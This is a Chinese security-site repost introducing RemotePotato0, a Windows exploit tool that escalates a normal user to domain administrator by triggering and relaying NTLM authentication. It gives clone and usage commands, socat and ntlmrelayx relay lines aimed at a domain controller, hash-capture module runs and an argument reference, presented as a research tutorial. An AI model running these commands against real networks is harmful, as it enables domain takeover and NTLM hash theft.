使用RemotePotato0从普通用户提升至域管理员

admin 2022年1月11日10:21:00安全文章评论24 views1672字阅读5分34秒阅读模式

关于RemotePotato0

RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。

RemotePotato0可以利用DCOM激活服务,并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时,该工具还需要在相同设备上已经有特权用户登录了(比如说,域管理员用户)。一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该服务器将负责接收特权type1消息,并通过解包RPC协议和HTTP打包身份验证,然后将其中继到第三个资源。在接收端,你可以设置另一个中继节点(如ntlmrelayx)或直接中继到特权资源。除此之外,RemotePotato0还允许抓取和窃取登录到目标设备上的每个用户的NTLMv2哈希。

源码获取

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/antonioCoco/RemotePotato0.git

使用场景

  • 攻击设备(10.0.0.20)

  • 目标设备(10.0.0.45)

  • 目标域控制器(10.0.0.10)

模块0 - Rpc2Http跨协议中继服务器 + potato触发器

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &

sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

注意:如果你操作的是Windows Server <= 2016,你可以避免使用网络重定向器(socat):

query user

.RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

模块1 - Rpc2Http跨协议中继服务器

.RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
rp*cping -s 127.0.0.1 -e 9997 -a connect -u ntlm

模块2 - RPC捕捉(哈希)服务器

.RemotePotato0.exe -m 3 -l 9997
rp*cping -s 127.0.0.1 -e 9997 -a connect -u ntlm

工具使用

RemotePotato0

        @splinter_code & @decoder_it

 

 

 

Mandatory args:

-m module

        Allowed values:

        0 - Rpc2Http cross protocol relay server + potato trigger (default)

        1 - Rpc2Http cross protocol relay server

        2 - Rpc capture (hash) server + potato trigger

        3 - Rpc capture (hash) server

 

 

Other args: (someone could be mandatory and/or optional based on the module you use)

-r 远程HTTP中继服务器IP

-t 远程HTTP中继服务器端口 (默认为80)

-x 流氓Oxid解析器IP (默认为127.0.0.1)

-p 流氓Oxid解析器端口 (默认为9999)

-l RPC中继服务器监听端口 (默认为9997)

-s 跨会话激活攻击的目标会话IP (默认为disabled)

-c CLSID (默认为{5167B42F-C111-47A1-ACC4-8EABE61B0B54})

工具演示

跨会话激活:【GIF】

哈希窃取:【GIF】

项目地址

RemotePotato0:https://github.com/antonioCoco/RemotePotato0


本文始发于微信公众号(盾山实验室):使用RemotePotato0从普通用户提升至域管理员

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月11日10:21:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  使用RemotePotato0从普通用户提升至域管理员 http://cn-sec.com/archives/471831.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: